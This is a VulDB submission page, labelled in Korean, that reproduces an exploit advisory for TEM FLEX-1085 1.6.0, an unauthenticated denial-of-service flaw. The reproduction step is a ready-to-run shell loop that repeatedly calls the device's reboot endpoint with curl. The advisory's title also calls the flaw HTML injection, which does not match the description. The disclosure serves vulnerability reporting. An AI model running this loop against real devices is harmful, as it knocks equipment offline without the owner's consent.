| 제목 | FLEX-1085 Web Denial of Service |
|---|
| 설명 | # Exploit Title: FLEX-1085 Web Denial of Service
# Date: 30/07/2022
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Linux
Title:
================
FLEX 1085 Web - HTML Injection
Summary:
================
A vulnerability, which was classified as problematic, was found in TEM FLEX-1085 1.6.0. Affected is an unknown function. The issue was identified as Denial of Service, allowing an unauthenticated malicious user to leave the device idle.
Severity Level:
================
7.5 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Affected Product:
================
FLEX 1085 Web v1.6.0
Steps to Reproduce:
================
1. Run this command in your terminal:
TARGET=http://target.com;while true;do curl -s $TARGET/sistema/flash/reboot > /dev/null;sleep 1;done |
|---|
| 원천 | ⚠️ https://www.tem.ind.br/?page=prod-detalhe&id=94&sid=0 |
|---|
| 사용자 | mrempy (UID 24379) |
|---|
| 제출 | 2022. 07. 31. AM 02:23 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 07. 31. AM 09:16 (7 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 205344 [TEM FLEX-1085 1.6.0 /sistema/flash/reboot 서비스 거부] |
|---|
| 포인트들 | 17 |
|---|